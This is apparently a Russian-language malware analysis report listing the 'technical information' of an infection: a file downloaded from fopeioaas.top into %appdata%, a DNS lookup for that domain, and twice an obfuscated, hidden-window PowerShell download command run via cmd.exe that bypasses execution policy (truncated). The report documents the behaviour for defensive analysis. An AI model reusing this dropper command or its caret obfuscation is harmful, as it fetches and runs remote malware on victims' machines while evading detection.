Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^W^ERSh^El^l.eX^E -E^xECUti^oNPOlICY ^bY^PA^Ss -n^oP^ROf^i^le^ -WiNDOwstYL^E hid^DEN (n^E^w^-oB^JECt sy^STEM^.net.wEbc^l^iENT).DOwN^LOAdfIL^E^('http://www.fopeioaas.t...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /c "p^O^W^ERSh^El^l.eX^E -E^xECUti^oNPOlICY ^bY^PA^Ss -n^oP^ROf^i^le^ -WiNDOwstYL^E hid^DEN (n^E^w^-oB^JECt sy^STEM^.net.wEbc^l^iENT).DOwN^LOAdfIL^E^('http://www.fopeioaas.t...' (со скрытым окном)